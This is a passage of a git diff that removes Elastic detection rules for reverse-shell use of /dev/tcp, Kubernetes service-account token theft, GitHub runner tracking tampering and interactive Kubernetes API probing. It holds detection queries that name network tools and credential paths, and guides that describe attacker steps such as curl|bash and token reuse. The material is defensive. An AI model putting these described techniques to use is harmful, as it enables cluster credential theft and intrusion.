-For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html -""" -severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend"] -timestamp_override = "event.ingested" -type = "eql" - -query = ''' -process where event.type in ("start", "process_started") and - process.name in ("sh", "bash", "zsh", "dash", "zmodload") and - process.args : ("*/dev/tcp/*", "*/dev/udp/*", "*zsh/net/tcp*", "*zsh/net/udp*") and - - /* noisy FPs */ - not (process.parent.name : "timeout" and process.executable : "/var/lib/docker/overlay*") and - not process.command_line : ( - "*/dev/tcp/sirh_db/*", "*/dev/tcp/remoteiot.com/*", "*dev/tcp/elk.stag.one/*", "*dev/tcp/kafka/*", - "*/dev/tcp/$0/$1*", "*/dev/tcp/127.*", "*/dev/udp/127.*", "*/dev/tcp/localhost/*", "*/dev/tcp/itom-vault/*") and - not process.parent.command_line : "runc init" -''' - - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" 
diff --git a/rules/cross-platform/credential_access_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml b/rules/cross-platform/credential_access_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml deleted file mode 100644 index 82698e80fea..00000000000 --- a/rules/cross-platform/credential_access_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml +++ /dev/null 
@@ -1,113 +0,0 @@ -[metadata] -creation_date = "2026/01/21" -integration = ["cloud_defend", "kubernetes"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the access to the service -account token or certificate followed by the execution of a direct interactive Kubernetes API request. An adversary may -need to access the service account token or certificate to gain access to the Kubernetes API server or other resources -within the cluster. These requests are often used to enumerate the Kubernetes API server or other resources within the -cluster, and may indicate an attempt to move laterally within the cluster. -""" -false_positives = [ - """ - There is a potential for false positives if the access to the service account token or certificate is used for legitimate purposes, - such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine - if they are indicative of malicious activity or part of legitimate container activity. - """, - """ - There is a risk of false positives if there are several containers named the same, as the rule may correlate the request - to the wrong container. - """, -] -from = "now-6m" -index = ["logs-cloud_defend.file*", "logs-kubernetes.audit_logs-*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Service Account Token or Certificate Access Followed by Kubernetes API Request" -note = """ ## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. 
While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
-
-### Investigating Service Account Token or Certificate Access Followed by Kubernetes API Request
-
-This rule correlates interactive access to a pod’s service account token or CA certificate with a near-immediate Kubernetes API request, signaling credential harvesting to query the cluster and potential lateral movement. An attacker execs into a container, reads /var/run/secrets/kubernetes.io/serviceaccount/token and ca.crt, then uses curl or kubectl with that token and CA to list pods, get secrets, or create a privileged pod to pivot across nodes.
-
-### Possible investigation steps
-
-- Attribute the activity by identifying the pod, container image, node, and interactive session initiator (e.g., kubectl exec) from Kubernetes events and cluster logs to determine whether a human or automation accessed the credentials.
-- Retrieve the pod’s service account and enumerate its RBAC bindings to assess effective privileges, highlighting any ability to read secrets, create pods, or modify roles.
-- Reconstruct the full sequence of audit log requests tied to that pod/user around the alert, noting resources, verbs, namespaces, response codes, and userAgent to distinguish legitimate controller behavior from reconnaissance.
-- Examine the container for signs of token abuse or exfiltration by reviewing shell history and filesystem artifacts, and correlate with network egress from the pod to external destinations.
-- Validate that the API request originated from the same pod by matching source IP, node, and TLS client identity, and check for concurrent suspicious activity on the node or other pods.
-
-### False positive analysis
-
-- A cluster operator troubleshooting an issue execs into a pod, inspects the service account token or CA certificate, and then uses the pod’s credentials to make a quick Kubernetes API request to verify permissions or list resources.
-- A workload running with TTY/stdin enabled is marked as interactive, and the application legitimately reads the service account token (e.g., on startup or token refresh) to perform routine API operations such as leader election or informer watches, producing the observed file access followed by audit log activity.
-
-### Response and remediation
-
-- Immediately isolate the pod that read /var/run/secrets/kubernetes.io/serviceaccount/token or ca.crt by deleting the pod or scaling its deployment to zero, cordoning its node if similar behavior is seen on other pods, and applying a NetworkPolicy that blocks the pod’s access to the API server while you capture its filesystem.
-- Revoke access by removing the implicated service account’s RBAC bindings, recreating the service account to invalidate tokens, restarting any workloads that mount /var/run/secrets/kubernetes.io/serviceaccount, and rotating the service-account signing key if compromise is suspected.
-- Validate and recover by reviewing audit records for unauthorized actions (e.g., secrets reads, pod or role changes), rolling back or deleting any malicious resources, and redeploying affected workloads from trusted images with signed releases.
-- Escalate to incident response immediately if you observe API requests from the pod that read secrets, create pods in other namespaces, alter Role or ClusterRoleBindings, or transmit the token/ca.crt via curl or similar tooling to external addresses.
-- Harden by disabling automountServiceAccountToken on pods that don't require it, scoping service accounts to a single namespace with least‑privilege RBAC, enforcing Pod Security Admission to block privileged/interactive shells, and restricting exec/attach via RBAC or admission policies.
-"""
-risk_score = 47
-rule_id = "4bd306f9-ee89-4083-91af-e61ed5c42b9a"
-severity = "medium"
-tags = ["Tactic: Credential Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend for Containers", "Data Source: Kubernetes", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
-timestamp_override = "event.ingested"
-type = "eql"
-query = '''
-sequence with maxspan=60s
- [file where host.os.type == "linux" and event.type == "change" and event.action == "open" and
- file.path in ("/var/run/secrets/kubernetes.io/serviceaccount/token", "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt") and
- process.interactive == true and container.id like "*"] by orchestrator.resource.name
- [any where event.dataset == "kubernetes.audit_logs" and kubernetes.audit.stage in ("ResponseComplete", "ResponseStarted")] by `kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name`
-'''
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1552.001"
-name = "Credentials In Files"
-reference = "https://attack.mitre.org/techniques/T1552/001/"
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1550.001"
-name = "Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1550/001/"
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
diff --git a/rules/cross-platform/defense_evasion_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml b/rules/cross-platform/defense_evasion_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml
deleted file mode 100644
index 65d688cfd2b..00000000000
--- a/rules/cross-platform/defense_evasion_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml
+++ /dev/null
@@ -1,121 +0,0 @@
-[metadata]
-creation_date = "2025/11/27"
-integration = ["endpoint"]
-maturity = "production"
-updated_date = "2026/03/23"
-
-[rule]
-author = ["Elastic"]
-description = """
-This rule detects processes spawned by GitHub Actions runners where "RUNNER_TRACKING_ID" is overridden from its
-default "github_*" value. Such tampering has been associated with attempts to evade runner tracking/cleanup on
-self-hosted runners, including behavior observed in the Shai-Hulud 2.0 npm worm campaign.
-"""
-from = "now-9m"
-index = ["logs-endpoint.events.process*"]
-language = "eql"
-license = "Elastic License v2"
-name = "Tampering with RUNNER_TRACKING_ID in GitHub Actions Runners"
-note = """## Triage and analysis
-
-> **Disclaimer**:
-> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
-
-### Investigating Tampering with RUNNER_TRACKING_ID in GitHub Actions Runners
-
-This rule surfaces processes launched by GitHub Actions runners where RUNNER_TRACKING_ID is deliberately set to a non-default value. Attackers do this to break runner job tracking and cleanup on self-hosted runners, enabling long‑lived or hidden workloads. A common pattern is a workflow step that exports a custom RUNNER_TRACKING_ID and then spawns bash or node to fetch and execute a script via curl|bash or npm install scripts, keeping the process alive after the job finishes to run mining or exfil tasks.
-
-### Possible investigation steps
-
-- Correlate the event to its GitHub Actions run/job and workflow YAML, identify the repository and actor (commit/PR), and verify whether RUNNER_TRACKING_ID was explicitly set in the workflow or injected by a step script.
-- On the runner host, determine if the spawned process persisted beyond job completion by checking for orphaning or reparenting to PID 1, sustained CPU/memory usage, and timestamps relative to the runner process exit.
-- Review nearby telemetry for fetch-and-execute patterns (curl|bash, wget, node/npm lifecycle scripts), unexpected file writes under /tmp or actions-runner/_work, and outbound connections to non-GitHub endpoints.
-- Enumerate persistence artifacts created during the run, including crontab entries, systemd unit files, pm2 or nohup sessions, and changes to authorized_keys or rc.local, and tie them back to the suspicious process.
-- Assess blast radius by listing secrets and tokens available to the job, checking audit logs for their subsequent use from the runner IP or unusual repositories, and decide whether to revoke or rotate credentials.
-
-### False positive analysis
-
-- A self-hosted runner bootstrap script or base image intentionally sets a fixed RUNNER_TRACKING_ID for internal log correlation or debugging, causing all runner-spawned processes to inherit a non-github_* value.
-- A composite action or reusable workflow accidentally overrides RUNNER_TRACKING_ID through env mapping or variable expansion (for example templating it from the run ID), resulting in benign non-default values during standard jobs.
-
-### Response and remediation
-
-- Quarantine the self-hosted runner by stopping Runner.Listener, removing the runner from the repository/organization, and terminating any Runner.Worker children or orphaned processes (PID 1) that carry a non-default RUNNER_TRACKING_ID.
-- Purge persistence by removing artifacts created during the run, including systemd unit files under /etc/systemd/system, crontab entries in /var/spool/cron, pm2/nohup sessions, edits to ~/.ssh/authorized_keys or /etc/rc.local, and files under /tmp and actions-runner/_work linked to the tampered process.
-- Revoke and rotate credentials exposed to the job (GITHUB_TOKEN, personal access tokens, cloud keys), delete leftover containers and caches in actions-runner/_work, invalidate the runner registration, and redeploy the runner from a clean, patched image.
-- Escalate to incident response if you observe outbound connections to non-GitHub endpoints, processes persisting after job completion, modifications to ~/.ssh/authorized_keys or /etc/systemd/system, or repeated RUNNER_TRACKING_ID tampering across runners or repositories.
-- Harden by restricting self-hosted runners to trusted repositories and actors, enforcing ephemeral per-job runners with egress allowlisting to github.com, setting strict job timeouts, and adding a workflow guard step that exits if RUNNER_TRACKING_ID does not start with github_."""
-references = [
- "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise",
- "https://socket.dev/blog/shai-hulud-strikes-again-v2",
- "https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack",
- "https://www.praetorian.com/blog/self-hosted-github-runners-are-backdoors/",
-]
-risk_score = 47
-rule_id = "df0553c8-2296-45ef-b4dc-3b88c4c130a7"
-setup = """## Setup
-
-This rule requires data coming in from Elastic Defend.
-
-### Elastic Defend Integration Setup
-Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.
-
-#### Prerequisite Requirements:
-- Fleet is required for Elastic Defend.
-- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).
-
-#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:
-- Go to the Kibana home page and click "Add integrations".
-- In the query bar, search for "Elastic Defend" and select the integration to see more details about it.
-- Click "Add Elastic Defend".
-- Configure the integration name and optionally add a description.
-- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads".
-- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).
-- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions"
-- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead.
-For more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).
-- Click "Save and Continue".
-- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts.
-For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
-
-Elastic Defend integration does not collect environment variable logging by default.
-In order to capture this behavior, this rule requires a specific configuration option set within the advanced settings of the Elastic Defend integration.
- #### To set up environment variable capture for an Elastic Agent policy:
-- Go to “Security → Manage → Policies”.
-- Select an “Elastic Agent policy”.
-- Click “Show advanced settings”.
-- Scroll down or search for “linux.advanced.capture_env_vars”.
-- Enter the names of environment variables you want to capture, separated by commas.
-- For Linux, this rule requires the linux.advanced.capture_env_vars variable to be set to "RUNNER_TRACKING_ID".
-- For macOS, this rule requires the macos.advanced.capture_env_vars variable to be set to "RUNNER_TRACKING_ID".
-- Click “Save”.
-After saving the integration change, the Elastic Agents running this policy will be updated and the rule will function properly.
-For more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html).
-"""
-severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
-timestamp_override = "event.ingested"
-type = "eql"
-query = '''
-process where host.os.type in ("linux", "macos") and event.type == "start" and event.action == "exec" and
-process.parent.name in ("Runner.Worker", "Runner.Listener") and process.env_vars like~ "RUNNER_TRACKING_ID*" and
-not process.env_vars like~ "RUNNER_TRACKING_ID=github_*"
-'''
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1562"
-name = "Impair Defenses"
-reference = "https://attack.mitre.org/techniques/T1562/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/cross-platform/discovery_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml b/rules/cross-platform/discovery_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml
deleted file mode 100644
index 539d57092b7..00000000000
--- a/rules/cross-platform/discovery_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml
+++ /dev/null
@@ -1,112 +0,0 @@
-[metadata]
-creation_date = "2026/01/21"
-integration = ["cloud_defend", "kubernetes"]
-maturity = "production"
-min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
-min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
-
-[rule]
-author = ["Elastic"]
-description = """
-This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the execution of direct
-interactive Kubernetes API requests. An adversary may need to execute direct interactive Kubernetes API requests to gain
-access to the Kubernetes API server or other resources within the cluster. These requests are often used to enumerate
-the Kubernetes API server or other resources within the cluster, and may indicate an attempt to move laterally within
-the cluster. Note that this rule may not trigger if the authorization token of the request is expanded within the process
-argument list, as the length of the "process.args" field may lead to the field being ignored.
-"""
-false_positives = [
- """
- There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes,
- such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine
- if they are indicative of malicious activity or part of legitimate container activity.
- """,
- """
- There is a risk of false positives if there are several containers named the same, as the rule may correlate the request
- to the wrong container.
- """,
-]
-from = "now-6m"
-index = ["logs-cloud_defend.process*", "logs-kubernetes.audit_logs-*"]
-interval = "5m"
-language = "eql"
-license = "Elastic License v2"
-name = "Direct Interactive Kubernetes API Request by Common Utilities"
-note = """ ## Triage and analysis
-
-> **Disclaimer**:
-> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
-
-### Investigating Direct Interactive Kubernetes API Request by Common Utilities
-
-This detection links an interactive invocation of common networking utilities or kubectl inside a container to a near-simultaneous Kubernetes API response, indicating hands-on-keyboard access to the API server for discovery or lateral movement. A common attacker pattern is compromising a pod, reading its mounted service account token, then running curl or kubectl interactively to query /api or /apis endpoints to list pods and secrets and map cluster scope.
-
-### Possible investigation steps
-
-- From Kubernetes audit logs linked to the pod, capture the authenticated principal, namespace, verbs, and request URIs to determine whether the activity focused on discovery or sensitive resources like secrets or RBAC objects.
-- Correlate the interactive container activity with kubelet exec/attach or terminal session telemetry to identify who initiated the session and through which source IP or control-plane endpoint.
-- Inspect the pod’s service account by validating access to the mounted token path and enumerating its RoleBindings and ClusterRoleBindings to quantify effective privileges and decide on immediate revocation or rotation.
-- Review the container image provenance and available shell history or command logs to confirm use of networking utilities or kubectl and identify any reads of secrets, kubeconfig files, or /api and /apis endpoints.
-- Expand the time window to find prior or subsequent API calls from the same pod, namespace, or node, and quarantine or cordon the workload if you observe sustained enumeration or cross-namespace access.
-
-### False positive analysis
-
-- An operator uses kubectl exec -it to enter a pod and runs kubectl or curl to list resources or verify RBAC, producing interactive process starts and near-simultaneous Kubernetes audit responses that are expected during troubleshooting.
-- During routine connectivity or certificate checks, an engineer attaches to a container that includes curl/openssl/socat/ncat and interactively tests the Kubernetes API server endpoint, generating correlated audit events without malicious intent.
-
-### Response and remediation
-
-- Immediately isolate the implicated pod by terminating the interactive shell and curl/kubectl processes, applying a deny-all NetworkPolicy in its namespace, and temporarily blocking pod egress to the kube-apiserver address.
-- Revoke and rotate the service account credentials used by the pod, invalidate the token at /var/run/secrets/kubernetes.io/serviceaccount/token, and remove excess RoleBindings or ClusterRoleBindings tied to that identity.
-- Delete and restore the workload from a trusted image that excludes curl/wget/openssl/socat/ncat, with automountServiceAccountToken disabled and least-privilege RBAC enforced.
-- Escalate to incident response if the pod read Secrets or ConfigMaps, modified RBAC objects, attempted create/patch/delete on cluster-scoped resources, or originated from an unapproved operator workstation or bastion.
-- Harden by restricting kubectl exec/attach to a small admin group with MFA, enabling admission controls (Pod Security Admission, Gatekeeper, or Kyverno) to block shells or kubectl/netcat in images, and applying egress NetworkPolicies so only approved namespaces can reach https://kubernetes.default.svc.
-"""
-risk_score = 47
-rule_id = "9d312839-339a-4e10-af2e-a49b15b15d13"
-severity = "medium"
-tags = ["Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Data Source: Kubernetes", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
-timestamp_override = "event.ingested"
-type = "eql"
-query = '''
-sequence with maxspan=1s
- [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and (
- process.name in ("wget", "curl", "openssl", "socat", "ncat", "kubectl") or
- (
- /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */
- process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and
- process.args in (
- "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget",
- "ssl_client", "/bin/ssl_client", "/usr/bin/ssl_client", "/usr/local/bin/ssl_client",
- "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl",
- "openssl", "/bin/openssl", "/usr/bin/openssl", "/usr/local/bin/openssl",
- "socat", "/bin/socat", "/usr/bin/socat", "/usr/local/bin/socat",
- "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat",
- "kubectl", "/bin/kubectl", "/usr/bin/kubectl", "/usr/local/bin/kubectl"
- ) and
- /* default exclusion list to not FP on default multi-process commands */
- not process.args in (
- "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which",
- "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man",
- "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod",
- "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown"
- )
- )
- ) and process.interactive == true and container.id like "*"
- ] by orchestrator.resource.name
- [any where event.dataset == "kubernetes.audit_logs" and kubernetes.audit.stage in ("ResponseComplete", "ResponseStarted")] by `kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name`
-'''
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
-
-[rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/cross-platform/discovery_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml b/rules/cross-platform/discovery_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml
deleted file mode 100644
index aed9622e71e..00000000000
--- a/rules/cross-platform/discovery_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml
+++ /dev/null
@@ -1,116 +0,0 @@
-[metadata]
-creation_date = "2026/01/21"
-integration = ["cloud_defend", "kubernetes"]
-maturity = "production"
-min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
-min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
-
-[rule]
-author = ["Elastic"]
-description = """
-This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the execution of forbidden
-interactive Kubernetes API requests. An adversary may need to execute interactive Kubernetes API requests to gain access
-to the Kubernetes API server or other resources within the cluster. These requests are often used to enumerate the
-Kubernetes API server or other resources within the cluster, and may indicate an attempt to move laterally within the
-cluster. Attackers may attempt to access resources that are forbidden by the authorization policy. Note that this rule may
-not trigger if the authorization token of the request is expanded within the process argument list, as the length of the
-"process.args" field may lead to the field being ignored.
-"""
-false_positives = [
- """
- There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes,
- such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine
- if they are indicative of malicious activity or part of legitimate container activity.
- """,
- """
- There is a risk of false positives if there are several containers named the same, as the rule may correlate the request
- to the wrong container.
- """,
-]
-from = "now-6m"
-index = ["logs-cloud_defend.process*", "logs-kubernetes.audit_logs-*"]
-interval = "5m"
-language = "eql"
-license = "Elastic License v2"
-name = "Forbidden Direct Interactive Kubernetes API Request"
-note = """ ## Triage and analysis
-
-> **Disclaimer**:
-> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
-
-### Investigating Forbidden Direct Interactive Kubernetes API Request
-
-This rule correlates an interactive command execution inside a container with a Kubernetes API request that is explicitly forbidden, signaling hands-on-keyboard probing and unauthorized access attempts. It matters because attackers use live shells to enumerate cluster resources and test privileges for lateral movement or escalation. Example: after compromising a pod, an operator opens a shell and runs kubectl get secrets or curls the API server with the pod’s token, repeatedly receiving 403 Forbidden.
-
-### Possible investigation steps
-
-- Correlate the pod, container, namespace, node, and service account from the alert, then quickly pull the matching audit entries to see the verb, resource, requestURI, and userAgent for the forbidden calls.
-- Determine whether the container image normally includes utilities like kubectl/curl/openssl or if they were dropped into the pod, and review recent file writes and package installs to differentiate admin debugging from hands-on-keyboard activity.
-- Inspect the pod’s service account bindings and effective RBAC in the target namespace to confirm least privilege and understand why the request was denied, then check for other successful API requests from the same identity around the same timeframe.
-- Review network connections from the pod to the API server (and any proxies) during the session to validate direct access paths, source IPs, and whether a mounted service account token from /var/run/secrets was used.
-- Validate whether this was an authorized SRE/debug session by contacting the workload owner and checking for recent kubectl exec or ephemeral debug activity; if not expected, expand the search for similar forbidden attempts from other pods.
-
-### False positive analysis
-
-- An authorized kubectl exec or ephemeral debug session inside a pod where an engineer runs kubectl or curl to probe API resources and, because the pod’s service account is intentionally least‑privileged, the requests are forbidden as expected.
-- Benign interactive troubleshooting that mistakenly uses the wrong namespace or queries cluster‑scoped endpoints from within the container (e.g., curl/openssl to the API server), causing the audit logs to show forbid decisions even though no malicious access was attempted.
-
-### Response and remediation
-
-- Immediately terminate the interactive shell (e.g., sh/bash) in the offending container and isolate the pod by applying a deny-egress NetworkPolicy in its namespace that blocks outbound connections to https://kubernetes.default.svc and the API server IPs.
-- Revoke and rotate credentials by deleting the pod and its ServiceAccount token Secret, temporarily setting automountServiceAccountToken: false on the workload, and redeploying with a new ServiceAccount after validating RBAC least privilege.
-- Remove attacker tooling and persistence by rebuilding the container image to exclude kubectl/curl/openssl/socat/ncat, clearing writable volume mounts that contain dropped binaries or scripts, and redeploying from a trusted registry.
-- Sweep for spread by identifying pods running the same image or on the same node and terminating any interactive processes issuing Kubernetes API requests from within containers, then restart those workloads cleanly.
-- Escalate to incident response if you observe successful API operations (200/201) on secrets, configmaps, or RBAC objects, exec into other pods, or privileged container settings (privileged=true, hostNetwork, or hostPID), indicating lateral movement or credential compromise.
-- Harden going forward by tightening RBAC on the new ServiceAccount, enforcing Gatekeeper/OPA policies to deny images that include kubectl/curl and block interactive shells, setting readOnlyRootFilesystem and dropping NET_ADMIN, and restricting API server access via egress controls.
-"""
-risk_score = 47
-rule_id = "5d1c962d-5d2a-48d4-bdcf-e980e3914947"
-severity = "medium"
-tags = ["Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Data Source: Kubernetes", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
-timestamp_override = "event.ingested"
-type = "eql"
-query = '''
-sequence with maxspan=1s
- [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and (
- process.name in ("wget", "curl", "openssl", "socat", "ncat", "kubectl") or
- (
- /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */
- process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and
- process.args in (
- "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget",
- "ssl_client", "/bin/ssl_client", "/usr/bin/ssl_client", "/usr/local/bin/ssl_client",
- "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl",
- "openssl", "/bin/openssl", "/usr/bin/openssl", "/usr/local/bin/openssl",
- "socat", "/bin/socat", "/usr/bin/socat", "/usr/local/bin/socat",
- "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat",
- "kubectl", "/bin/kubectl", "/usr/bin/kubectl", "/usr/local/bin/kubectl"
- ) and
- /* default exclusion list to not FP on default multi-process commands */
- not process.args in (
- "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which",
- "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man",
- "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod",
- "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown"
- )
- )
- ) and process.interactive == true and container.id like "*"
- ] by orchestrator.resource.name
- [any where event.dataset == "kubernetes.audit_logs" and kubernetes.audit.stage in ("ResponseComplete", "ResponseStarted") and
- `kubernetes.audit.annotations.authorization_k8s_io/decision` == "forbid"
- ] by `kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name`
-'''
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
-
-[rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/cross-platform/discovery_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml b/rules/cross-platform/discovery_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml
deleted file mode 100644
index 834d2e997a9..00000000000
--- a/rules/cross-platform/discovery_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml
+++ /dev/null
@@ -1,164 +0,0 @@
-[metadata]
-creation_date = "2026/01/21"
-integration = ["cloud_defend", "kubernetes"]
-maturity = "production"
-min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
-min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
-
-[rule]
-author = ["Elastic"]
-description = """
-This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the execution of direct
-interactive Kubernetes API requests via unusual utilities. An adversary may need to execute direct interactive Kubernetes
-API requests to gain access to the Kubernetes API server or other resources within the cluster. These requests are often
-used to enumerate the Kubernetes API server or other resources within the cluster, and may indicate an attempt to move
-laterally within the cluster.
-"""
-false_positives = [
- """
- There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes,
- such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine
- if they are indicative of malicious activity or part of legitimate container activity.
- """,
- """
- There is a risk of false positives if there are several containers named the same, as the rule may correlate the request
- to the wrong container.
- """,
-]
-from = "now-6m"
